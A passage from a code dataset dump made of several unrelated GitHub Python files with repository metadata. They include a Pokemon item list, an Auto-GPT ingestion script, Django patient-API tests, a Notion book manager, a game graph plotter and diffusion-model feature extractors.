WEPEAR_BERRY, PINAP_BERRY, POMEG_BERRY, KELPSY_BERRY, QUALOT_BERRY, HONDEW_BERRY, GREPA_BERRY, TAMATO_BERRY,\r\n CORNN_BERRY, MAGOST_BERRY, RABUTA_BERRY, NOMEL_BERRY, SPELON_BERRY, PAMTRE_BERRY, WATMEL_BERRY, DURIN_BERRY,\r\n BELUE_BERRY, OCCA_BERRY, PASSHO_BERRY, WACAN_BERRY, RINDO_BERRY, YACHE_BERRY, CHOPLE_BERRY, KEBIA_BERRY,\r\n SHUCA_BERRY, COBA_BERRY, PAYAPA_BERRY, TANGA_BERRY, CHARTI_BERRY, KASIB_BERRY, HABAN_BERRY, COLBUR_BERRY,\r\n BABIRI_BERRY, CHILAN_BERRY, LIECHI_BERRY, GANLON_BERRY, SALAC_BERRY, PETAYA_BERRY, APICOT_BERRY, LANSAT_BERRY,\r\n STARF_BERRY, ENIGMA_BERRY, MICLE_BERRY, CUSTAP_BERRY, JABOCA_BERRY, ROWAP_BERRY, GRASS_MAIL, FLAME_MAIL,\r\n BUBBLE_MAIL, BLOOM_MAIL, TUNNEL_MAIL, STEEL_MAIL, HEART_MAIL, SNOW_MAIL, SPACE_MAIL, AIR_MAIL, MOSAIC_MAIL,\r\n BRICK_MAIL, X_ATTACK, X_ATTACK_2, X_ATTACK_3, X_ATTACK_6, X_DEFENSE, X_DEFENSE_2, X_DEFENSE_3, X_DEFENSE_6,\r\n X_SP_ATK, X_SP_ATK_2, X_SP_ATK_3, X_SP_ATK_6, X_SP_DEF, X_SP_DEF_2, X_SP_DEF_3, X_SP_DEF_6, X_SPEED, X_SPEED_2,\r\n X_SPEED_3, X_SPEED_6, X_ACCURACY, X_ACCURACY_2, X_ACCURACY_3, X_ACCURACY_6, DIRE_HIT, DIRE_HIT_2, DIRE_HIT_3,\r\n GUARD_SPEC, RESET_URGE, ABILITY_URGE, ITEM_URGE, ITEM_DROP, BLUE_FLUTE, YELLOW_FLUTE, RED_FLUTE, POKE_DOLL,\r\n FLUFFY_TAIL, POKE_TOY, BICYCLE, OLD_ROD, GOOD_ROD, SUPER_ROD, ITEMFINDER, DOWSING_MACHINE, POKE_RADAR,\r\n TOWN_MAP, POKE_FLUTE, COIN_CASE, SOOT_SACK, SILPH_SCOPE, DEVON_SCOPE, SQUIRT_BOTTLE, SPRAYDUCK, WAILMER_PAIL,\r\n GRACIDEA, AURORA_TICKET, OLD_SEA_MAP, DNA_SPLICERS, REVEAL_GLASS, OVAL_CHARM, SHINY_CHARM, ICE_STONE,\r\n JAW_FOSSIL, SAIL_FOSSIL, RED_NECTAR, YELLOW_NECTAR, PINK_NECTAR, PURPLE_NECTAR, ASSAULT_VEST, SAFETY_GOGGLES,\r\n PROTECTIVE_PADS, TERRAIN_EXTENDER, ELECTRIC_SEED, PSYCHIC_SEED, MISTY_SEED, GRASSY_SEED, LUMINOUS_MOSS,\r\n SNOWBALL, WEAKNESS_POLICY, ADRENALINE_ORB, PIXIE_PLATE, FAIRY_GEM, FIRE_MEMORY, WATER_MEMORY, ELECTRIC_MEMORY,\r\n GRASS_MEMORY, ICE_MEMORY, FIGHTING_MEMORY, POISON_MEMORY, GROUND_MEMORY, FLYING_MEMORY, PSYCHIC_MEMORY,\r\n BUG_MEMORY, ROCK_MEMORY, GHOST_MEMORY, DRAGON_MEMORY, DARK_MEMORY, STEEL_MEMORY, FAIRY_MEMORY, VENUSAURITE,\r\n CHARIZARDITE_X, CHARIZARDITE_Y, BLASTOISINITE, BEEDRILLITE, PIDGEOTITE, ALAKAZITE, SLOWBRONITE, GENGARITE,\r\n KANGASKHANITE, PINSIRITE, GYARADOSITE, AERODACTYLITE, MEWTWONITE_X, MEWTWONITE_Y, AMPHAROSITE, STEELIXITE,\r\n SCIZORITE, HERACRONITE, HOUNDOOMINITE, TYRANITARITE, SCEPTILITE, BLAZIKENITE, SWAMPERTITE, GARDEVOIRITE,\r\n SABLENITE, MAWILITE, AGGRONITE, MEDICHAMITE, MANECTITE, SHARPEDONITE, CAMERUPTITE, ALTARIANITE, BANETTITE,\r\n ABSOLITE, GLALITITE, SALAMENCITE, METAGROSSITE, LATIASITE, LATIOSITE, LOPUNNITE, GARCHOMPITE, LUCARIONITE,\r\n ABOMASITE, GALLADITE, AUDINITE, DIANCITE, RED_ORB, BLUE_ORB, WHIPPED_DREAM, SACHET, LUMIOSE_GALETTE,\r\n SHALOUR_SABLE, BIG_MALASADA, ABILITY_CAPSULE, DREAM_BALL, BEAST_BALL, TM96, TM97, TM98, TM99, TM100,\r\n ROSELI_BERRY, KEE_BERRY, MARANGA_BERRY, SPRINKLOTAD, PRISON_BOTTLE, N_SOLARIZER, N_LUNARIZER, MEGA_RING]\r\n\r\nITEM_TABLE = {}\r\nfor it in ITEMS:\r\n ITEM_TABLE[it.replace(\"_\", \" \")] = it\r\n\r\ndef get_item(name):\r\n try:\r\n return ITEM_TABLE[name]\r\n except KeyError:\r\n print(\"No Item.\")\r\n return None\r\n\r\n#print(get_item('Choice Band'))","repo_name":"JanOkke/PokemonAI","sub_path":"items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":24601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42638628889","text":"import argparse\nimport logging\n\nfrom autogpt.config import Config\nfrom autogpt.file_operations import ingest_file, search_files\nfrom autogpt.memory import get_memory\n\ncfg = Config()\n\n\ndef configure_logging():\n logging.basicConfig(\n filename=\"log-ingestion.txt\",\n filemode=\"a\",\n format=\"%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s\",\n datefmt=\"%H:%M:%S\",\n level=logging.DEBUG,\n )\n return logging.getLogger(\"AutoGPT-Ingestion\")\n\n\ndef ingest_directory(directory, memory, args):\n \"\"\"\n 通过为每个文件调用 ingest_file 函数来摄取目录中的所有文件。\n\n :param directory: 包含要摄取的文件的目录\n :param memory: 具有 add() 方法的对象,用于将块存储在内存中\n \"\"\"\n try:\n files = search_files(directory)\n for file in files:\n ingest_file(file, memory, args.max_length, args.overlap)\n except Exception as e:\n print(f\"获取目录 '{directory}' 时出错:{str(e)}\")\n\n\ndef main() -> None:\n logger = configure_logging()\n\n parser = argparse.ArgumentParser(\n description=\"Ingest a file or a directory with multiple files into memory. \"\n \"Make sure to set your .env before running this script.\"\n )\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"--file\", type=str, help=\"The file to ingest.\")\n group.add_argument(\n \"--dir\", type=str, help=\"The directory containing the files to ingest.\"\n )\n parser.add_argument(\n \"--init\",\n action=\"store_true\",\n help=\"Init the memory and wipe its content (default: False)\",\n default=False,\n )\n parser.add_argument(\n \"--overlap\",\n type=int,\n help=\"The overlap size between chunks when ingesting files (default: 200)\",\n default=200,\n )\n parser.add_argument(\n \"--max_length\",\n type=int,\n help=\"The max_length of each chunk when ingesting files (default: 4000)\",\n default=4000,\n )\n\n args = parser.parse_args()\n\n # Initialize memory\n memory = get_memory(cfg, init=args.init)\n print(\"使用内存类型:\" + memory.__class__.__name__)\n\n if args.file:\n try:\n ingest_file(args.file, memory, args.max_length, args.overlap)\n print(f\"文件 '{args.file}' 已成功获取。\")\n except Exception as e:\n logger.error(f\"获取文件 '{args.file}' 时出错:{str(e)}\")\n print(f\"获取文件 '{args.file}' 时出错:{str(e)}\")\n elif args.dir:\n try:\n ingest_directory(args.dir, memory, args)\n print(f\"目录 '{args.dir}' 成功获取。\")\n except Exception as e:\n logger.error(f\"获取目录 '{args.dir}' 时出错:{str(e)}\")\n print(f\"获取目录 '{args.dir}' 时出错:{str(e)}\")\n else:\n print(\n \"请提供 auto_gpt_workspace 目录中的文件路径 (--file) 或目录名称 (--dir) 作为输入。\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Chenluckly/Auto-GPT-ZH-master","sub_path":"autogpt/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"40560625470","text":"from pandas import read_csv\nimport numpy as np\n\n### Loading in the data ###\nTEST_PERCENTAGE = 0.15\nVAL_PERCENTAGE = 0.1\n\ndata = read_csv(\"./data_3.txt\", header = None).to_numpy(copy=True)\nnp.random.shuffle(data)\n\nval_end = int(len(data) * VAL_PERCENTAGE)\ntest_end = val_end + int(len(data) * TEST_PERCENTAGE)\nvalx = data[:val_end,:17]\nvaly = data[:val_end,17:]\ntestx = data[val_end:test_end,:17]\ntesty = data[val_end:test_end,17:]\ntrainx = data[test_end:,:17]\ntrainy = data[test_end:,17:]\n\nprint(f\"Training: {len(trainx)} Validation: {len(valx)} Test: {len(testx)}\")\ninput()","repo_name":"AtesIsf/SACPhoenix","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10485979013","text":"# -*- coding:utf-8 -*-\nfrom django.contrib.auth.models import Permission\nimport pytest\nfrom faker import Faker\nfrom mixer.backend.django import mixer\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nfrom rest_framework_jwt.settings import api_settings\nfrom django.test import TestCase\nfrom django.core.files.uploadedfile import SimpleUploadedFile\n\nfrom userapp.models import User\nfrom patientapp.models import Patient\nfrom addressapp.models import Geography, ActivityArea\n\npytestmark = pytest.mark.django_db\njwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\njwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\nfake = Faker()\n\n\nclass TestPatientListView(TestCase):\n def test_list_patient(self):\n client = APIClient()\n # un authorized access by user\n response = client.post('/api/v1/patients')\n assert response.status_code == 401, 'Un authorized access denied.'\n\n # authorized user\n user_obj = mixer.blend(User)\n payload = jwt_payload_handler(user_obj)\n token = jwt_encode_handler(payload)\n client.credentials(HTTP_AUTHORIZATION='JWT ' + token)\n response = client.get('/api/v1/patients',format='json')\n print(response)\n assert response.status_code == 204, 'patients content not found'\n\n # authorized user\n user_obj = mixer.blend(User,admin=True)\n payload = jwt_payload_handler(user_obj)\n token = jwt_encode_handler(payload)\n client.credentials(HTTP_AUTHORIZATION='JWT ' + token)\n response = client.get('/api/v1/patients',format='json')\n print(response)\n assert response.status_code == 200, 'patients list for admin'\n\n # # authorized user\n # user_obj = mixer.blend(User)\n # geography_obj = mixer.blend(Geography)\n # activityarea_obj = mixer.blend(ActivityArea)\n # patients_obj = mixer.blend(Patient,author=user_obj,geography=geography_obj,activity_area=activityarea_obj)\n # payload = jwt_payload_handler(user_obj)\n # token = jwt_encode_handler(payload)\n # client.credentials(HTTP_AUTHORIZATION='JWT ' + token)\n # response = client.get('/api/v1/patients',format='json')\n # print(response)\n # assert response.status_code == 200, 'patients list for users'\n\n def test_post_patient(self):\n activityarea_obj = mixer.blend(ActivityArea)\n geography_obj = mixer.blend(Geography)\n client = APIClient()\n\n # un authorized access by user\n response = client.post('/api/v1/patients')\n assert response.status_code == 401, 'Un authorized access denied.'\n\n # authorized user\n user_obj = User.objects.create(email=fake.email(),\\\n first_name=fake.name(),last_name=fake.name())\n payload = jwt_payload_handler(user_obj)\n token = jwt_encode_handler(payload)\n client.credentials(HTTP_AUTHORIZATION='JWT ' + token)\n response = client.post('/api/v1/patients', {'first_name':fake.name(),\\\n 'last_name':fake.name(),'gender':'male','dob':'1996-03-21',\\\n 'phone':\"2312164654\",'education':'bachelor',\\\n 'author':str(user_obj),'latitude':'12',\\\n 'longitude':'21','country':fake.name(),\\\n 'city':fake.name(),'state':fake.name(),\\\n 'street_address':fake.name(),'ward':12,\\\n 'activityarea_id':str(activityarea_obj.id),\\\n 'geography_id':str(geography_obj.id),\n 'id':fake.name(),\n 'middle_name':fake.name(),\n 'marital_status':'single'},format='json')\n assert response.status_code == 200, 'patients created'\n\n\n # serializers error\n user_obj = User.objects.create(email=fake.email(),\\\n first_name=fake.name(),last_name=fake.name())\n payload = jwt_payload_handler(user_obj)\n token = jwt_encode_handler(payload)\n client.credentials(HTTP_AUTHORIZATION='JWT ' + token)\n response = client.post('/api/v1/patients', {'first_name':'',\\\n 'last_name':fake.name(),'gender':'male','dob':'1996-03-21',\\\n 'phone':\"2312164654\",'education':'bachelor',\\\n 'author':str(user_obj),'latitude':'12',\\\n 'longitude':'21','country':fake.name(),\\\n 'city':fake.name(),'state':fake.name(),'street_address':fake.name(),'ward':12},format='json')\n assert response.status_code == 400, 'serializers error'\n\n","repo_name":"AbhiyantrikTechnology/DentalHub-Backend","sub_path":"patientapp/test/api/test_patientapi.py","file_name":"test_patientapi.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23366879922","text":"import asyncio\nimport logging\nimport os\nfrom typing import Dict, List, Union\n\nfrom notion_client.errors import APIResponseError\nfrom tenacity import retry, retry_if_exception_type, stop_after_attempt, wait_fixed\n\nfrom normalizer import Normalizer\nfrom notion_db_API import NotionDBAPI\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nretry_decorator = retry(\n wait=wait_fixed(1),\n stop=stop_after_attempt(5),\n retry=retry_if_exception_type(APIResponseError),\n)\n\n\nclass BookManager:\n \"\"\"\n Manages the business logic for book entries in the Notion database.\n \"\"\"\n\n def __init__(self, api: NotionDBAPI):\n self.api = api\n self.database_id = api.database_id or os.getenv(\"NOTION_DATABASE_ID\")\n self.notion = api.notion\n\n @retry_decorator\n async def get_existing_ratings(self) -> Dict[str, Dict[str, Union[int, str]]]:\n \"\"\"\n Fetches existing ratings from the Notion database.\n\n Returns:\n Dict[str, Dict[str, Union[int, str]]]: A dictionary containing existing ratings.\n \"\"\"\n try:\n all_entries = await NotionDBAPI.fetch_paginated_results(\n self.notion.databases.query, database_id=self.database_id\n )\n return await self.get_existing_book_entries(all_entries)\n except APIResponseError as error:\n logger.error(f\"API Error ({error.code}): {error.body}\")\n return {}\n except Exception as error:\n logger.exception(f\"Unexpected error: {error}\")\n return {}\n\n @retry_decorator\n async def get_existing_book_entries(\n self, data: List[Dict[str, str]]\n ) -> Dict[str, str]:\n \"\"\"\n Extracts existing book entries from Notion database data.\n\n Args:\n data (List[Dict[str, str]]): List of database entries.\n\n Returns:\n Dict[str, str]: A dictionary containing existing book entries.\n \"\"\"\n existing_book_entries = {}\n for entry in data:\n book_title = Normalizer.normalize_name(\n entry[\"properties\"][\"Book Title\"][\"title\"][0][\"text\"][\"content\"]\n )\n\n existing_book_entries[book_title] = {\n \"pageId\": entry[\"id\"],\n \"rating\": entry[\"properties\"][\"Rating\"][\"number\"],\n \"favorites\": entry[\"properties\"][\"Favorites\"][\"number\"],\n \"least_favorites\": entry[\"properties\"][\"Least Favorites\"][\"number\"],\n }\n return existing_book_entries\n\n @retry_decorator\n async def upsert_books_to_database(\n self, new_ratings: Dict[str, Dict], existing_ratings: Dict[str, Dict]\n ) -> None:\n \"\"\"\n Update or add books in the database based on new ratings.\n\n Args:\n new_ratings (Dict[str, Dict]): Dictionary containing new ratings.\n existing_ratings (Dict[str, Dict]): Dictionary containing existing ratings.\n \"\"\"\n books_to_update = []\n books_to_add = []\n\n for book_title, book_stats in new_ratings.items():\n if book_title in existing_ratings:\n existing_entry = existing_ratings[book_title]\n\n differences = [\n book_stats[\"rating\"] != existing_entry.get(\"rating\", 0),\n book_stats[\"favorites\"] != existing_entry.get(\"favorites\", 0),\n book_stats[\"least_favorites\"]\n != existing_entry.get(\"least_favorites\", 0),\n ]\n\n if any(differences):\n updated_entry = {\n **book_stats,\n \"book\": book_title,\n \"pageId\": existing_entry[\"pageId\"],\n }\n\n books_to_update.append(updated_entry)\n else:\n new_entry = {**book_stats, \"book\": book_title}\n books_to_add.append(new_entry)\n\n for entry in books_to_update:\n await self.update_book(entry)\n\n for entry in books_to_add:\n await self.add_book(entry)\n\n @retry_decorator\n async def add_book(self, book_entry: Dict):\n \"\"\"\n Add a new book entry to the Notion database.\n\n Args:\n book_entry (Dict): A dictionary containing book entry data.\n \"\"\"\n try:\n return await self.api.add_page(await self.get_properties(book_entry))\n except APIResponseError as error:\n logger.error(f\"API Error ({error.code}): {error.body}\")\n except Exception as error:\n logger.exception(f\"Unexpected error: {error}\")\n\n @retry_decorator\n async def update_book(self, updated_book_entry: Dict):\n \"\"\"\n Update an existing book entry in the Notion database.\n\n Args:\n updated_book_entry (Dict): A dictionary containing updated book entry data.\n \"\"\"\n try:\n return await self.api.update_page(\n updated_book_entry[\"pageId\"],\n await self.get_properties(updated_book_entry),\n )\n except APIResponseError as error:\n logger.error(f\"API Error ({error.code}): {error.body}\")\n except Exception as error:\n logger.exception(f\"Unexpected error: {error}\")\n\n @retry_decorator\n async def delete_all_books(self):\n \"\"\"\n Delete all books from the Notion database.\n \"\"\"\n try:\n all_entries = await NotionDBAPI.fetch_paginated_results(\n self.api.query_database\n )\n for entry in all_entries:\n await self.api.archive_page(entry[\"id\"])\n except APIResponseError as error:\n logger.error(f\"API Error ({error.code}): {error.body}\")\n except Exception as error:\n logger.exception(f\"Unexpected error: {error}\")\n\n async def get_properties(\n self, book_entry: Dict[str, Union[str, float]]\n ) -> Dict[str, Dict]:\n \"\"\"\n Constructs the properties of a book entry for Notion.\n\n Args:\n book_entry (Dict[str, Union[str, float]]): A dictionary containing book entry data.\n\n Returns:\n Dict[str, Dict]: A dictionary containing the properties of a book entry for Notion.\n \"\"\"\n return {\n \"Book Title\": {\"title\": [{\"text\": {\"content\": book_entry[\"book\"]}}]},\n \"Rating\": {\"number\": book_entry[\"rating\"]},\n \"Favorites\": {\"number\": book_entry[\"favorites\"]},\n \"Least Favorites\": {\"number\": book_entry[\"least_favorites\"]},\n }\n\n\nasync def main():\n # Get the Notion API token from the environment variable\n token = os.getenv(\"NOTION_TOKEN\")\n\n # Print the last 4 characters of the token (for debugging)\n print(f\"Token: {token[-4:]}\")\n\n # Initialize the Notion database\n notion_databases = BookManager(NotionDBAPI())\n\n # Delete all books\n await notion_databases.delete_all_books()\n\n # Define new ratings\n new_ratings = {\n \"The Hobbit\": {\"rating\": 5, \"favorites\": 1},\n \"The Fellowship of the Ring\": {\"rating\": 5, \"favorites\": 1},\n }\n\n # Get the current database entries\n existing_ratings = await notion_databases.get_existing_ratings()\n\n # Update the database with new ratings\n await notion_databases.upsert_books_to_database(\n new_ratings=new_ratings, existing_ratings=existing_ratings\n )\n\n # Delete all books\n await notion_databases.delete_all_books()\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"ChocoTonic/notion_book_club_aggregator","sub_path":"src/book_manager.py","file_name":"book_manager.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25804522953","text":"#!c:\\anaconda3\\python3\n\nimport game_models\nimport math\nfrom graphviz import Digraph\n\nclass GamePlotter:\n\n TYPE_COLORS = {\n game_models.PointType.capital:\"red\",\n game_models.PointType.city:\"yellow\",\n game_models.PointType.repeat:\"green\",\n game_models.PointType.skip:\"gray\",\n game_models.PointType.none:\"white\"\n }\n\n def plot_model(self, game_model : game_models.GameModel, radius=200):\n paths = game_model.extract_paths()\n\n coords = {}\n path_length = len(paths[0])\n for pos in range(path_length):\n x = radius * math.cos(pos*2*math.pi / path_length )\n y = radius * math.sin(pos*2*math.pi / path_length )\n coords[paths[0][pos].id] = {\"x\":x, \"y\":y}\n\n graph = Digraph(format='svg', engine=\"neato\")\n\n for pid in game_model.points:\n pos = \"%f,%f\" % (coords[pid][\"x\"], coords[pid][\"y\"]) if pid in coords else None\n fillcolor = self.TYPE_COLORS[game_model.points[pid].type]\n\n graph.node(pid, pos=pos, style=\"filled\", fillcolor=fillcolor, tooltip=game_model.getAnnotatedPid(pid))\n\n for pid in game_model.points:\n for connection in game_model.points[pid].connections:\n graph.edge(pid, connection.id)\n\n for pid in game_model.points:\n transition = game_model.points[pid].transition\n if transition is None:\n continue\n target_pid = game_model.points[pid].transition.id\n color = \"green\" if game_models.GameModel.pidToInt(pid) < game_models.GameModel.pidToInt(target_pid) else \"red\"\n graph.edge(pid, target_pid, color=color)\n\n graph.render('test')","repo_name":"Tomcat256/world-journey-game","sub_path":"PythonModel/game_visualization.py","file_name":"game_visualization.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23294352001","text":"from core.domain import config_domain\nfrom core.domain import config_services\nfrom core.tests import test_utils\nimport schema_utils_test\n\n\nclass ConfigPropertyRegistryTests(test_utils.GenericTestBase):\n \"\"\"Tests for the config property registry.\"\"\"\n\n def test_config_property_schemas_are_valid(self):\n for property_name in config_domain.Registry._config_registry: # pylint: disable=protected-access\n schema = config_domain.Registry.get_config_property(\n property_name).schema\n schema_utils_test.validate_schema(schema)\n\n\nclass DerivedConfigPropertyTests(test_utils.GenericTestBase):\n \"\"\"Tests for derived config properties (i.e., those that are not directly\n settable).\"\"\"\n\n def test_derived_config_properties_cannot_be_set_directly(self):\n self.signup(self.MODERATOR_EMAIL, self.MODERATOR_USERNAME)\n\n with self.assertRaisesRegexp(\n Exception,\n 'Cannot modify value of config property moderator_ids directly'\n ):\n config_services.set_property(\n self.MODERATOR_EMAIL, config_domain.MODERATOR_IDS.name,\n [self.get_user_id_from_email(self.MODERATOR_EMAIL)])\n\n def test_setting_derived_config_properties(self):\n self.signup(self.MODERATOR_EMAIL, self.MODERATOR_USERNAME)\n\n self.assertEqual(config_domain.MODERATOR_USERNAMES.value, [])\n self.assertEqual(config_domain.MODERATOR_IDS.value, [])\n\n self.set_moderators([self.MODERATOR_USERNAME])\n self.assertEqual(\n config_domain.MODERATOR_USERNAMES.value,\n [self.MODERATOR_USERNAME])\n self.assertEqual(\n config_domain.MODERATOR_IDS.value,\n [self.get_user_id_from_email(self.MODERATOR_EMAIL)])\n\n self.set_moderators([])\n self.assertEqual(config_domain.MODERATOR_USERNAMES.value, [])\n self.assertEqual(config_domain.MODERATOR_IDS.value, [])\n","repo_name":"zgchizi/oppia-uc","sub_path":"core/domain/config_domain_test.py","file_name":"config_domain_test.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21888953424","text":"import sys\nimport torch\nfrom torch import nn\nfrom typing import List\n\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\ndef create_feature_extractor(model_type, **kwargs):\n \"\"\" Create the feature extractor for architecture. \"\"\"\n if model_type == 'ddpm':\n print(\"Creating DDPM Feature Extractor...\")\n feature_extractor = FeatureExtractorDDPM(**kwargs)\n elif model_type == 'mae':\n print(\"Creating MAE Feature Extractor...\")\n feature_extractor = FeatureExtractorMAE(**kwargs)\n elif model_type == 'swav':\n print(\"Creating SwAV Feature Extractor...\")\n feature_extractor = FeatureExtractorSwAV(**kwargs)\n elif model_type == 'swav_w2':\n print(\"Creating SwAVw2 Feature Extractor...\")\n feature_extractor = FeatureExtractorSwAVw2(**kwargs)\n else:\n raise Exception(f\"Wrong model type: {model_type}\")\n return feature_extractor\n\n\ndef save_tensors(module: nn.Module, features, name: str):\n \"\"\" Process and save activations in the module. \"\"\"\n if type(features) in [list, tuple]:\n features = [f.detach().float() if f is not None else None \n for f in features]\n setattr(module, name, features)\n elif isinstance(features, dict):\n features = {k: f.detach().float() for k, f in features.items()}\n setattr(module, name, features)\n else:\n setattr(module, name, features.detach().float())\n\n\ndef save_out_hook(self, inp, out):\n save_tensors(self, out, 'activations')\n return out\n\n\ndef save_input_hook(self, inp, out):\n save_tensors(self, inp[0], 'activations')\n return out\n\n\nclass FeatureExtractor(nn.Module):\n def __init__(self, model_path: str, input_activations: bool, **kwargs):\n ''' \n Parent feature extractor class.\n \n param: model_path: path to the pretrained model\n param: input_activations: \n If True, features are input activations of the corresponding blocks\n If False, features are output activations of the corresponding blocks\n '''\n super().__init__()\n self._load_pretrained_model(model_path, **kwargs)\n print(f\"Pretrained model is successfully loaded from {model_path}\")\n self.save_hook = save_input_hook if input_activations else save_out_hook\n self.feature_blocks = []\n\n def _load_pretrained_model(self, model_path: str, **kwargs):\n pass\n\n\nclass FeatureExtractorDDPM(FeatureExtractor):\n ''' \n Wrapper to extract features from pretrained DDPMs.\n \n :param steps: list of diffusion steps t.\n :param blocks: list of the UNet decoder blocks.\n '''\n \n def __init__(self, steps: List[int], blocks: List[int], **kwargs):\n super().__init__(**kwargs)\n self.steps = steps\n \n # Save decoder activations\n for idx, block in enumerate(self.model.output_blocks):\n if idx in blocks:\n block.register_forward_hook(self.save_hook)\n self.feature_blocks.append(block)\n\n def _load_pretrained_model(self, model_path, **kwargs):\n import inspect\n import guided_diffusion.guided_diffusion.dist_util as dist_util\n from guided_diffusion.guided_diffusion.script_util import create_model_and_diffusion\n\n # Needed to pass only expected args to the function\n argnames = inspect.getfullargspec(create_model_and_diffusion)[0]\n expected_args = {name: kwargs[name] for name in argnames}\n self.model, self.diffusion = create_model_and_diffusion(**expected_args)\n \n self.model.load_state_dict(\n dist_util.load_state_dict(model_path, map_location=\"cpu\")\n )\n self.model.to(dist_util.dev())\n if kwargs['use_fp16']:\n self.model.convert_to_fp16()\n self.model.eval()\n\n @torch.no_grad()\n def forward(self, x, noise=None):\n activations = []\n for t in self.steps:\n # Compute x_t and run DDPM\n t = torch.tensor([t]).to(x.device)\n noisy_x = self.diffusion.q_sample(x, t, noise=noise)\n self.model(noisy_x, self.diffusion._scale_timesteps(t))\n\n # Extract activations\n for block in self.feature_blocks:\n activations.append(block.activations)\n block.activations = None\n\n # Per-layer list of activations [N, C, H, W]\n return activations\n\n\nclass FeatureExtractorMAE(FeatureExtractor):\n ''' \n Wrapper to extract features from pretrained MAE\n '''\n def __init__(self, num_blocks=12, **kwargs):\n super().__init__(**kwargs)\n\n # Save features from deep encoder blocks \n for layer in self.model.blocks[-num_blocks:]:\n layer.register_forward_hook(self.save_hook)\n self.feature_blocks.append(layer)\n\n def _load_pretrained_model(self, model_path, **kwargs):\n import mae\n from functools import partial\n sys.path.append(mae.__path__[0])\n from mae.models_mae import MaskedAutoencoderViT\n\n # Create MAE with ViT-L-8 backbone \n model = MaskedAutoencoderViT(\n img_size=256, patch_size=8, embed_dim=1024, depth=24, num_heads=16,\n decoder_embed_dim=512, decoder_depth=8, decoder_num_heads=16,\n mlp_ratio=4, norm_layer=partial(nn.LayerNorm, eps=1e-6), norm_pix_loss=True\n )\n\n checkpoint = torch.load(model_path, map_location='cpu')\n model.load_state_dict(checkpoint['model'])\n self.model = model.eval().to(device)\n\n @torch.no_grad()\n def forward(self, x, **kwargs):\n _, _, ids_restore = self.model.forward_encoder(x, mask_ratio=0)\n ids_restore = ids_restore.unsqueeze(-1)\n sqrt_num_patches = int(self.model.patch_embed.num_patches ** 0.5)\n activations = []\n for block in self.feature_blocks:\n # remove cls token \n a = block.activations[:, 1:]\n # unshuffle patches\n a = torch.gather(a, dim=1, index=ids_restore.repeat(1, 1, a.shape[2])) \n # reshape to obtain spatial feature maps\n a = a.permute(0, 2, 1)\n a = a.view(*a.shape[:2], sqrt_num_patches, sqrt_num_patches)\n\n activations.append(a)\n block.activations = None\n # Per-layer list of activations [N, C, H, W]\n return activations\n\n\nclass FeatureExtractorSwAV(FeatureExtractor):\n ''' \n Wrapper to extract features from pretrained SwAVs \n '''\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n layers = [self.model.layer1, self.model.layer2,\n self.model.layer3, self.model.layer4]\n\n # Save features from sublayers\n for layer in layers:\n for l in layer[::2]:\n l.register_forward_hook(self.save_hook)\n self.feature_blocks.append(l)\n\n def _load_pretrained_model(self, model_path, **kwargs):\n import swav\n sys.path.append(swav.__path__[0])\n from swav.hubconf import resnet50\n\n model = resnet50(pretrained=False).to(device).eval()\n model.fc = nn.Identity()\n model = torch.nn.DataParallel(model)\n state_dict = torch.load(model_path)['state_dict']\n model.load_state_dict(state_dict, strict=False) \n self.model = model.module.eval()\n\n @torch.no_grad()\n def forward(self, x, **kwargs):\n self.model(x)\n\n activations = []\n for block in self.feature_blocks:\n activations.append(block.activations)\n block.activations = None\n\n # Per-layer list of activations [N, C, H, W]\n return activations\n \n\nclass FeatureExtractorSwAVw2(FeatureExtractorSwAV):\n ''' \n Wrapper to extract features from twice wider pretrained SwAVs \n '''\n def _load_pretrained_model(self, model_path, **kwargs):\n import swav\n sys.path.append(swav.__path__[0])\n from swav.hubconf import resnet50w2\n\n model = resnet50w2(pretrained=False).to(device).eval()\n model.fc = nn.Identity()\n model = torch.nn.DataParallel(model)\n state_dict = torch.load(model_path)['state_dict']\n model.load_state_dict(state_dict, strict=False) \n self.model = model.module.eval()\n\n\ndef collect_features(args, activations: List[torch.Tensor], sample_idx=0):\n \"\"\" Upsample activations and concatenate them to form a feature tensor \"\"\"\n assert all([isinstance(acts, torch.Tensor) for acts in activations])\n size = tuple(args['dim'][:-1])\n resized_activations = []\n for feats in activations:\n feats = feats[sample_idx][None]\n feats = nn.functional.interpolate(\n feats, size=size, mode=args[\"upsample_mode\"]\n )\n resized_activations.append(feats[0])\n \n return torch.cat(resized_activations, dim=0)\n","repo_name":"yandex-research/ddpm-segmentation","sub_path":"src/feature_extractors.py","file_name":"feature_extractors.py","file_ext":"py","file_size_in_byte":8825,"program_lang":"python","lang":"en","doc_type":"code","stars":572,"dataset":"github-code","pt":"48"} +{"seq_id":"35382133309","text":"from rest_framework import viewsets\n\nfrom rest_framework.response import Response\nfrom .serializers import PatrimonioSerializers\n\nfrom compras.models import CompraModel\nfrom vendas.models import VendaModel\nfrom .models import 